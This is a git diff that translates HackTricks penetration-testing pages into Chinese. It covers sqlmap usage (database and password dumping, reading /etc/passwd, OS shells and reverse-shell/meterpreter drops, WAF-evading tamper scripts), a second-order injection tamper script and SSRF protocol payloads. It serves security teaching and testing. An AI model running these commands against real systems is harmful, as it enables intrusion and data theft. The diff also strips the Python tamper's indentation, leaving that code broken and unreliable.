+| charencode.py                | 对给定有效负载中的所有字符进行 URL 编码（不处理已编码的字符）                                                                      |
+| charunicodeencode.py         | 对给定有效负载中未编码的字符进行 Unicode URL 编码（不处理已编码的字符）。 "%u0022"                                               |
+| charunicodeescape.py         | 对给定有效负载中未编码的字符进行 Unicode URL 编码（不处理已编码的字符）。 "\u0022"                                               |
+| equaltolike.py               | 用运算符 'LIKE' 替换运算符等于 \('='\) 的所有出现                                                                                   |
+| escapequotes.py              | 斜杠转义引号 \(' 和 "\)                                                                                                            |
+| greatest.py                  | 用 'GREATEST' 对应字符替换大于运算符 \('&gt;'\)                                                                                   |
+| halfversionedmorekeywords.py | 在每个关键字前添加版本化的 MySQL 注释                                                                                             |
+| ifnull2ifisnull.py           | 用 'IF\(ISNULL\(A\), B, A\)' 替换 'IFNULL\(A, B\)' 的实例                                                                          |
+| modsecurityversioned.py      | 用版本化注释包裹完整查询                                                                                                           |
+| modsecurityzeroversioned.py  | 用零版本化注释包裹完整查询                                                                                                         |
+| multiplespaces.py            | 在 SQL 关键字周围添加多个空格                                                                                                       |
+| nonrecursivereplacement.py   | 用适合替换的表示法替换预定义的 SQL 关键字（例如 .replace\("SELECT", ""\) 过滤器）                                                |
+| percentage.py                | 在每个字符前添加百分号 \('%'\)                                                                                                     |
+| overlongutf8.py              | 转换给定有效负载中的所有字符（不处理已编码的字符）                                                                                 |
+| randomcase.py                | 用随机大小写值替换每个关键字字符                                                                                                   |
+| randomcomments.py            | 向 SQL 关键字添加随机注释                                                                                                          |
+| securesphere.py              | 附加特殊构造的字符串                                                                                                               |
+| sp_password.py               | 在有效负载末尾附加 'sp_password' 以自动混淆 DBMS 日志                                                                             |
+| space2comment.py             | 用注释替换空格字符 \(' '\)                                                                                                         |
+| space2dash.py                | 用一个破折号注释 \('--'\) 替换空格字符 \(' '\)，后跟一个随机字符串和换行符 \('\n'\)                                               |
+| space2hash.py                | 用一个井号字符 \('\#'\) 替换空格字符 \(' '\)，后跟一个随机字符串和换行符 \('\n'\)                                                |
+| space2morehash.py            | 用一个井号字符 \('\#'\) 替换空格字符 \(' '\)，后跟一个随机字符串和换行符 \('\n'\)                                                |
+| space2mssqlblank.py          | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\)                                                                               |
+| space2mssqlhash.py           | 用一个井号字符 \('\#'\) 替换空格字符 \(' '\)，后跟一个换行符 \('\n'\)                                                             |
+| space2mysqlblank.py          | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\)                                                                               |
+| space2mysqldash.py           | 用一个破折号注释 \('--'\) 替换空格字符 \(' '\)，后跟一个换行符 \('\n'\)                                                          |
+| space2plus.py                | 用加号 \('+'\) 替换空格字符 \(' '\)                                                                                                 |
+| space2randomblank.py         | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\)                                                                               |
+| symboliclogical.py           | 用其符号对应物替换 AND 和 OR 逻辑运算符 \(&& 和                                                                                     |
+| unionalltounion.py           | 用 UNION SELECT 替换 UNION ALL SELECT                                                                                               |
+| unmagicquotes.py             | 用多字节组合 %bf%27 替换引号字符 \('\)，并在末尾添加通用注释（以使其工作）                                                        |
+| uppercase.py                 | 用大写值 'INSERT' 替换每个关键字字符                                                                                               |
+| varnish.py                   | 附加 HTTP 头 'X-originating-IP'                                                                                                     |
+| versionedkeywords.py         | 用版本化的 MySQL 注释包裹每个非函数关键字                                                                                           |
+| versionedmorekeywords.py     | 用版本化的 MySQL 注释包裹每个关键字                                                                                                 |
+| xforwardedfor.py             | 附加一个假 HTTP 头 'X-Forwarded-For'                                                                                                 |
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/sqlmap/README.md b/src/pentesting-web/sql-injection/sqlmap/README.md
index e28e1592a..434533f37 100644
--- a/src/pentesting-web/sql-injection/sqlmap/README.md
+++ b/src/pentesting-web/sql-injection/sqlmap/README.md
@@ -4,16 +4,15 @@
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度审视您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化漏洞利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
-## Basic arguments for SQLmap
-
-### Generic
+## SQLmap的基本参数
 
+### 通用
 ```bash
 -u "<URL>"
 -p "<PARAM TO TEST>"
@@ -31,11 +30,9 @@
 --proxy=http://127.0.0.1:8080
 --union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
 ```
+### 获取信息
 
-### Retrieve Information
-
-#### Internal
-
+#### 内部
 ```bash
 --current-user #Get current user
 --is-dba #Check if current user is Admin
@@ -44,9 +41,7 @@
 --passwords #Get passwords of users in DB
 --privileges #Get privileges
 ```
-
-#### DB data
-
+#### 数据库数据
 ```bash
 --all #Retrieve everything
 --dump #Dump DBMS database table entries
@@ -55,34 +50,26 @@
 --columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
 -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
 ```
+使用 [SQLMapping](https://taurusomar.github.io/sqlmapping/) 是一个实用工具，可以生成命令并提供 SQLMap 的完整概述，包括基本和高级功能。它包括工具提示，解释工具的每个方面，详细说明每个选项，以便您可以提高并理解如何有效和高效地使用它。
 
-Using [SQLMapping](https://taurusomar.github.io/sqlmapping/) it is a practical tool that generates commands and provides a complete overview, both basic and advanced, for SQLMap. It includes ToolTips that explain each aspect of the tool, detailing every option so that you can improve and understand how to use it efficiently and effectively
+## 注入位置
 
-## Injection place
-
-### From Burp/ZAP capture
-
-Capture the request and create a req.txt file
+### 从 Burp/ZAP 捕获
 
+捕获请求并创建 req.txt 文件
 ```bash
 sqlmap -r req.txt --current-user
 ```
-
-### GET Request Injection
-
+### GET 请求注入
 ```bash
 sqlmap -u "http://example.com/?id=1" -p id
 sqlmap -u "http://example.com/?id=*" -p id
 ```
-
-### POST Request Injection
-
+### POST 请求注入
 ```bash
 sqlmap -u "http://example.com" --data "username=*&password=*"
 ```
-
-### Injections in Headers and other HTTP Methods
-
+### 在头部和其他HTTP方法中的注入
 ```bash
 #Inside cookie
 sqlmap  -u "http://example.com" --cookie "mycookies=*"
@@ -96,23 +83,17 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
 
 #The injection is located at the '*'
 ```
-
-### Indicate string when injection is successful
-
+### 当注入成功时指示字符串
 ```bash
 --string="string_showed_when_TRUE"
 ```
-
 ### Eval
 
-**Sqlmap** allows the use of `-e` or `--eval` to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the **flask cookie session** **is signed by flask with the known secret before sending it**:
-
+**Sqlmap** 允许使用 `-e` 或 `--eval` 在发送之前处理每个有效负载，使用一些 python 单行代码。这使得在发送之前以自定义方式处理有效负载变得非常简单和快速。在以下示例中，**flask cookie session** **在发送之前由 flask 使用已知的密钥进行签名**：
 ```bash
 sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
 ```
-
 ### Shell
-
 ```bash
 #Exec command
 python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
@@ -123,15 +104,11 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
 #Dropping a reverse-shell / meterpreter
 python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
 ```
-
-### Read File
-
+### 读取文件
 ```bash
 --file-read=/etc/passwd
 ```
-
-### Crawl a website with SQLmap and auto-exploit
-
+### 使用SQLmap爬取网站并自动利用
 ```bash
 sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
 
@@ -139,102 +116,90 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
 --crawl = how deep you want to crawl a site
 --forms = Parse and test forms
 ```
-
-### Second Order Injection
-
+### 二次注入
 ```bash
 python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
 ```
+[**阅读此帖子** ](second-order-injection-sqlmap.md)**关于如何使用 sqlmap 执行简单和复杂的二次注入。**
 
-[**Read this post** ](second-order-injection-sqlmap.md)**about how to perform simple and complex second order injections with sqlmap.**
-
-## Customizing Injection
-
-### Set a suffix
+## 自定义注入
 
+### 设置后缀
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
 ```
-
-### Prefix
-
+### 前缀
 ```bash
 python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
 ```
-
-### Help finding boolean injection
-
+### 帮助寻找布尔注入
 ```bash
 # The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
 sqlmap -r r.txt -p id --not-string ridiculous --batch
 ```
-
 ### Tamper
 
-Remember that **you can create your own tamper in python** and it's very simple. You can find a tamper example in the [Second Order Injection page here](second-order-injection-sqlmap.md).
-
+记住，**你可以用 Python 创建自己的 tamper**，这非常简单。你可以在[第二次注入页面这里](second-order-injection-sqlmap.md)找到一个 tamper 示例。
 ```bash
 --tamper=name_of_the_tamper
 #In kali you can see all the tampers in /usr/share/sqlmap/tamper
 ```
-
 | Tamper                       | Description                                                                                                                        |
 | ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
-| apostrophemask.py            | Replaces apostrophe character with its UTF-8 full width counterpart                                                                |
-| apostrophenullencode.py      | Replaces apostrophe character with its illegal double unicode counterpart                                                          |
-| appendnullbyte.py            | Appends encoded NULL byte character at the end of payload                                                                          |
-| base64encode.py              | Base64 all characters in a given payload                                                                                           |
-| between.py                   | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'                                                                    |
-| bluecoat.py                  | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
-| chardoubleencode.py          | Double url-encodes all characters in a given payload (not processing already encoded)                                              |
-| commalesslimit.py            | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'                                                                       |
-| commalessmid.py              | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'                                                                  |
-| concat2concatws.py           | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'                                                  |
-| charencode.py                | Url-encodes all characters in a given payload (not processing already encoded)                                                     |
-| charunicodeencode.py         | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022"                           |
-| charunicodeescape.py         | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022"                           |
-| equaltolike.py               | Replaces all occurances of operator equal ('=') with operator 'LIKE'                                                               |
-| escapequotes.py              | Slash escape quotes (' and ")                                                                                                      |
-| greatest.py                  | Replaces greater than operator ('>') with 'GREATEST' counterpart                                                                   |
-| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword                                                                                   |
-| ifnull2ifisnull.py           | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'                                                                  |
-| modsecurityversioned.py      | Embraces complete query with versioned comment                                                                                     |
-| modsecurityzeroversioned.py  | Embraces complete query with zero-versioned comment                                                                                |
-| multiplespaces.py            | Adds multiple spaces around SQL keywords                                                                                           |
-| nonrecursivereplacement.py   | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters               |
-| percentage.py                | Adds a percentage sign ('%') infront of each character                                                                             |
-| overlongutf8.py              | Converts all characters in a given payload (not processing already encoded)                                                        |
-| randomcase.py                | Replaces each keyword character with random case value                                                                             |
-| randomcomments.py            | Add random comments to SQL keywords                                                                                                |
-| securesphere.py              | Appends special crafted string                                                                                                     |
-| sp_password.py               | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs                                           |
-| space2comment.py             | Replaces space character (' ') with comments                                                                                       |
-| space2dash.py                | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')                        |
-| space2hash.py                | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')                      |
-| space2morehash.py            | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')                      |
-| space2mssqlblank.py          | Replaces space character (' ') with a random blank character from a valid set of alternate characters                              |
-| space2mssqlhash.py           | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')                                          |
-| space2mysqlblank.py          | Replaces space character (' ') with a random blank character from a valid set of alternate characters                              |
-| space2mysqldash.py           | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')                                            |
-| space2plus.py                | Replaces space character (' ') with plus ('+')                                                                                     |
-| space2randomblank.py         | Replaces space character (' ') with a random blank character from a valid set of alternate characters                              |
-| symboliclogical.py           | Replaces AND and OR logical operators with their symbolic counterparts (&& and                                                     |
-| unionalltounion.py           | Replaces UNION ALL SELECT with UNION SELECT                                                                                        |
-| unmagicquotes.py             | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)             |
-| uppercase.py                 | Replaces each keyword character with upper case value 'INSERT'                                                                     |
-| varnish.py                   | Append a HTTP header 'X-originating-IP'                                                                                            |
-| versionedkeywords.py         | Encloses each non-function keyword with versioned MySQL comment                                                                    |
-| versionedmorekeywords.py     | Encloses each keyword with versioned MySQL comment                                                                                 |
-| xforwardedfor.py             | Append a fake HTTP header 'X-Forwarded-For'                                                                                        |
+| apostrophemask.py            | 用其 UTF-8 全宽对应字符替换撇号字符                                                                                              |
+| apostrophenullencode.py      | 用其非法双重 Unicode 对应字符替换撇号字符                                                                                        |
+| appendnullbyte.py            | 在有效负载末尾附加编码的 NULL 字节字符                                                                                            |
+| base64encode.py              | 对给定有效负载中的所有字符进行 Base64 编码                                                                                       |
+| between.py                   | 用 'NOT BETWEEN 0 AND #' 替换大于运算符 ('>')                                                                                     |
+| bluecoat.py                  | 用有效的随机空白字符替换 SQL 语句后的空格字符。然后用 LIKE 运算符替换字符 =                                                        |
+| chardoubleencode.py          | 对给定有效负载中的所有字符进行双重 URL 编码（不处理已编码的字符）                                                                  |
+| commalesslimit.py            | 用 'LIMIT N OFFSET M' 替换类似 'LIMIT M, N' 的实例                                                                                |
+| commalessmid.py              | 用 'MID(A FROM B FOR C)' 替换类似 'MID(A, B, C)' 的实例                                                                          |
+| concat2concatws.py           | 用 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' 替换类似 'CONCAT(A, B)' 的实例                                                          |
+| charencode.py                | 对给定有效负载中的所有字符进行 URL 编码（不处理已编码的字符）                                                                     |
+| charunicodeencode.py         | 对给定有效负载中未编码的字符进行 Unicode URL 编码（不处理已编码的字符）。"%u0022"                                               |
+| charunicodeescape.py         | 对给定有效负载中未编码的字符进行 Unicode URL 编码（不处理已编码的字符）。"\u0022"                                               |
+| equaltolike.py               | 用运算符 'LIKE' 替换所有等于运算符 ('=') 的出现                                                                                   |
+| escapequotes.py              | 斜杠转义引号 (' 和 ")                                                                                                            |
+| greatest.py                  | 用 'GREATEST' 对应字符替换大于运算符 ('>')                                                                                        |
+| halfversionedmorekeywords.py | 在每个关键字前添加版本化的 MySQL 注释                                                                                            |
+| ifnull2ifisnull.py           | 用 'IF(ISNULL(A), B, A)' 替换类似 'IFNULL(A, B)' 的实例                                                                          |
+| modsecurityversioned.py      | 用版本化注释包裹完整查询                                                                                                          |
+| modsecurityzeroversioned.py  | 用零版本化注释包裹完整查询                                                                                                        |
+| multiplespaces.py            | 在 SQL 关键字周围添加多个空格                                                                                                     |
+| nonrecursivereplacement.py   | 用适合替换的表示法替换预定义的 SQL 关键字（例如 .replace("SELECT", ""）过滤器                                                  |
+| percentage.py                | 在每个字符前添加百分号 ('%')                                                                                                     |
+| overlongutf8.py              | 转换给定有效负载中的所有字符（不处理已编码的字符）                                                                                |
+| randomcase.py                | 用随机大小写值替换每个关键字字符                                                                                                   |
+| randomcomments.py            | 向 SQL 关键字添加随机注释                                                                                                         |
+| securesphere.py              | 附加特殊构造的字符串                                                                                                              |
+| sp_password.py               | 在有效负载末尾附加 'sp_password' 以自动混淆 DBMS 日志                                                                            |
+| space2comment.py             | 用注释替换空格字符 (' ')                                                                                                          |
+| space2dash.py                | 用破折号注释 ('--') 替换空格字符 (' ')，后跟随机字符串和换行符 ('\n')                                                            |
+| space2hash.py                | 用井号字符 ('#') 替换空格字符 (' ')，后跟随机字符串和换行符 ('\n')                                                              |
+| space2morehash.py            | 用井号字符 ('#') 替换空格字符 (' ')，后跟随机字符串和换行符 ('\n')                                                              |
+| space2mssqlblank.py          | 用有效替代字符集中的随机空白字符替换空格字符 (' ')                                                                                |
+| space2mssqlhash.py           | 用井号字符 ('#') 替换空格字符 (' ')，后跟换行符 ('\n')                                                                          |
+| space2mysqlblank.py          | 用有效替代字符集中的随机空白字符替换空格字符 (' ')                                                                                |
+| space2mysqldash.py           | 用破折号注释 ('--') 替换空格字符 (' ')，后跟换行符 ('\n')                                                                        |
+| space2plus.py                | 用加号 ('+') 替换空格字符 (' ')                                                                                                   |
+| space2randomblank.py         | 用有效替代字符集中的随机空白字符替换空格字符 (' ')                                                                                |
+| symboliclogical.py           | 用其符号对应物（&& 和）替换 AND 和 OR 逻辑运算符                                                                                   |
+| unionalltounion.py           | 用 UNION SELECT 替换 UNION ALL SELECT                                                                                              |
+| unmagicquotes.py             | 用多字节组合 %bf%27 替换引号字符 (')，并在末尾添加通用注释（以使其工作）                                                          |
+| uppercase.py                 | 用大写值 'INSERT' 替换每个关键字字符                                                                                              |
+| varnish.py                   | 附加 HTTP 头 'X-originating-IP'                                                                                                    |
+| versionedkeywords.py         | 用版本化的 MySQL 注释包裹每个非函数关键字                                                                                          |
+| versionedmorekeywords.py     | 用版本化的 MySQL 注释包裹每个关键字                                                                                                 |
+| xforwardedfor.py             | 附加假 HTTP 头 'X-Forwarded-For'                                                                                                   |
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们 20 多个自定义工具来映射攻击面，查找让您提升权限的安全问题，并使用自动化利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
index 3851e7244..a47002a1a 100644
--- a/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
+++ b/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
@@ -1,15 +1,14 @@
 {{#include ../../../banners/hacktricks-training.md}}
 
-**SQLMap can exploit Second Order SQLis.**\
-You need to provide:
+**SQLMap 可以利用二次 SQL 注入。**\
+您需要提供：
 
-- The **request** where the **sqlinjection payload** is going to be saved
-- The **request** where the **payload** will be **executed**
+- 保存 **sqlinjection payload** 的 **请求**
+- **执行** **payload** 的 **请求**
 
-The request where the SQL injection payload is saved is **indicated as in any other injection in sqlmap**. The request **where sqlmap can read the output/execution** of the injection can be indicated with `--second-url` or with `--second-req` if you need to indicate a complete request from a file.
-
-**Simple second order example:**
+保存 SQL 注入 payload 的请求 **与 sqlmap 中的任何其他注入相同**。可以使用 `--second-url` 或 `--second-req` 指定 **sqlmap 可以读取注入的输出/执行** 的请求，如果您需要从文件中指示完整请求。
 
+**简单的二次注入示例：**
 ```bash
 #Get the SQL payload execution with a GET to a url
 sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
@@ -17,11 +16,9 @@ sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
 #Get the SQL payload execution sending a custom request from a file
 sqlmap -r login.txt -p username --second-req details.txt
 ```
+在某些情况下**这还不够**，因为您需要**执行其他操作**，除了发送有效负载和访问不同的页面。
 
-In several cases **this won't be enough** because you will need to **perform other actions** apart from sending the payload and accessing a different page.
-
-When this is needed you can use a **sqlmap tamper**. For example the following script will register a new user **using sqlmap payload as email** and logout.
-
+当需要这样做时，您可以使用**sqlmap tamper**。例如，以下脚本将注册一个新用户**使用 sqlmap 有效负载作为电子邮件**并注销。
 ```python
 #!/usr/bin/env python
 
@@ -31,36 +28,34 @@ from lib.core.enums import PRIORITY
 __priority__ = PRIORITY.NORMAL
 
 def dependencies():
-    pass
+pass
 
 def login_account(payload):
-    proxies = {'http':'http://127.0.0.1:8080'}
-    cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
+proxies = {'http':'http://127.0.0.1:8080'}
+cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
 
-    params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
-    url = "http://10.10.10.10/create.php"
-    pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
+params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
+url = "http://10.10.10.10/create.php"
+pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
 
-    url = "http://10.10.10.10/exit.php"
-    pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
+url = "http://10.10.10.10/exit.php"
+pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
 
 def tamper(payload, **kwargs):
-    headers = kwargs.get("headers", {})
-    login_account(payload)
-    return payload
+headers = kwargs.get("headers", {})
+login_account(payload)
+return payload
 ```
+一个 **SQLMap tamper 总是在开始注入尝试之前执行，并且必须返回一个有效负载**。在这种情况下，我们不关心有效负载，但我们关心发送一些请求，因此有效负载不会改变。
 
-A **SQLMap tamper is always executed before starting a injection try with a payload** **and it has to return a payload**. In this case we don't care about the payload but we care about sending some requests, so the payload isn't changed.
+因此，如果出于某种原因，我们需要一个更复杂的流程来利用二次 SQL 注入，例如：
 
-So, if for some reason we need a more complex flow to exploit the second order SQL injection like:
-
-- Create an account with the SQLi payload inside the "email" field
-- Logout
-- Login with that account (login.txt)
-- Send a request to execute the SQL injection (second.txt)
-
-**This sqlmap line will help:**
+- 在“email”字段中创建一个包含 SQLi 有效负载的帐户
+- 登出
+- 使用该帐户登录 (login.txt)
+- 发送请求以执行 SQL 注入 (second.txt)
 
+**这条 sqlmap 命令将会有所帮助：**
 ```bash
 sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
 ##########
@@ -75,6 +70,4 @@ sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy
 # --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
 # -a : Dump all
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
index 0d8f4c8ed..907c04260 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md
@@ -3,20 +3,20 @@
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+今天获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-A **Server-side Request Forgery (SSRF)** vulnerability occurs when an attacker manipulates a **server-side application** into making **HTTP requests** to a domain of their choice. This vulnerability exposes the server to arbitrary external requests directed by the attacker.
+**服务器端请求伪造 (SSRF)** 漏洞发生在攻击者操纵 **服务器端应用程序** 使其向他们选择的域发出 **HTTP 请求** 时。此漏洞使服务器暴露于攻击者指向的任意外部请求。
 
-## Capture SSRF
+## 捕获 SSRF
 
-The first thing you need to do is to capture a SSRF interaction generated by you. To capture a HTTP or DNS interaction you can use tools such as:
+您需要做的第一件事是捕获由您生成的 SSRF 交互。要捕获 HTTP 或 DNS 交互，您可以使用以下工具：
 
 - **Burp Collaborator**
 - [**pingb**](http://pingb.in)
@@ -26,36 +26,35 @@ The first thing you need to do is to capture a SSRF interaction generated by you
 - [**https://github.com/teknogeek/ssrf-sheriff**](https://github.com/teknogeek/ssrf-sheriff)
 - [http://requestrepo.com/](http://requestrepo.com/)
 - [https://github.com/stolenusername/cowitness](https://github.com/stolenusername/cowitness)
-- [https://github.com/dwisiswant0/ngocok](https://github.com/dwisiswant0/ngocok) - A Burp Collaborator using ngrok
+- [https://github.com/dwisiswant0/ngocok](https://github.com/dwisiswant0/ngocok) - 使用 ngrok 的 Burp Collaborator
 
-## Whitelisted Domains Bypass
+## 白名单域名绕过
 
-Usually you will find that the SSRF is only working in **certain whitelisted domains** or URL. In the following page you have a **compilation of techniques to try to bypass that whitelist**:
+通常，您会发现 SSRF 仅在 **某些白名单域名** 或 URL 中有效。在以下页面中，您有一个 **尝试绕过该白名单的技术汇编**：
 
 {{#ref}}
 url-format-bypass.md
 {{#endref}}
 
-### Bypass via open redirect
+### 通过开放重定向绕过
 
-If the server is correctly protected you could **bypass all the restrictions by exploiting an Open Redirect inside the web page**. Because the webpage will allow **SSRF to the same domain** and probably will **follow redirects**, you can exploit the **Open Redirect to make the server to access internal any resource**.\
-Read more here: [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
+如果服务器得到了正确的保护，您可以 **通过利用网页中的开放重定向来绕过所有限制**。因为网页将允许 **SSRF 到同一域**，并且可能会 **跟随重定向**，您可以利用 **开放重定向使服务器访问内部任何资源**。\
+在这里阅读更多： [https://portswigger.net/web-security/ssrf](https://portswigger.net/web-security/ssrf)
 
-## Protocols
+## 协议
 
 - **file://**
-  - The URL scheme `file://` is referenced, pointing directly to `/etc/passwd`: `file:///etc/passwd`
+- URL 方案 `file://` 被引用，直接指向 `/etc/passwd`: `file:///etc/passwd`
 - **dict://**
-  - The DICT URL scheme is described as being utilized for accessing definitions or word lists via the DICT protocol. An example given illustrates a constructed URL targeting a specific word, database, and entry number, as well as an instance of a PHP script being potentially misused to connect to a DICT server using attacker-provided credentials: `dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>`
+- DICT URL 方案被描述为用于通过 DICT 协议访问定义或单词列表。给出的一个示例说明了一个构造的 URL，针对特定单词、数据库和条目编号，以及一个 PHP 脚本可能被滥用以使用攻击者提供的凭据连接到 DICT 服务器的实例： `dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>`
 - **SFTP://**
-  - Identified as a protocol for secure file transfer over secure shell, an example is provided showcasing how a PHP script could be exploited to connect to a malicious SFTP server: `url=sftp://generic.com:11111/`
+- 被识别为通过安全外壳进行安全文件传输的协议，提供了一个示例，展示了如何利用 PHP 脚本连接到恶意 SFTP 服务器： `url=sftp://generic.com:11111/`
 - **TFTP://**
-  - Trivial File Transfer Protocol, operating over UDP, is mentioned with an example of a PHP script designed to send a request to a TFTP server. A TFTP request is made to 'generic.com' on port '12346' for the file 'TESTUDPPACKET': `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
+- 提到简单文件传输协议，操作在 UDP 上，提供了一个 PHP 脚本的示例，旨在向 TFTP 服务器发送请求。向 'generic.com' 的端口 '12346' 发送 TFTP 请求以获取文件 'TESTUDPPACKET': `ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET`
 - **LDAP://**
-  - This segment covers the Lightweight Directory Access Protocol, emphasizing its use for managing and accessing distributed directory information services over IP networks.Interact with an LDAP server on localhost: `'%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.`
+- 本节涵盖轻量级目录访问协议，强调其用于管理和访问通过 IP 网络分布的目录信息服务。在本地主机上与 LDAP 服务器交互： `'%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.`
 - **SMTP**
-  - A method is described for exploiting SSRF vulnerabilities to interact with SMTP services on localhost, including steps to reveal internal domain names and further investigative actions based on that information.
-
+- 描述了一种利用 SSRF 漏洞与本地主机上的 SMTP 服务交互的方法，包括揭示内部域名的步骤以及基于该信息的进一步调查行动。
 ```
 From https://twitter.com/har1sec/status/1182255952055164929
 1. connect with SSRF on smtp localhost:25
@@ -63,24 +62,20 @@ From https://twitter.com/har1sec/status/1182255952055164929
 3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
 4. connect
 ```
-
-- **Curl URL globbing - WAF bypass**
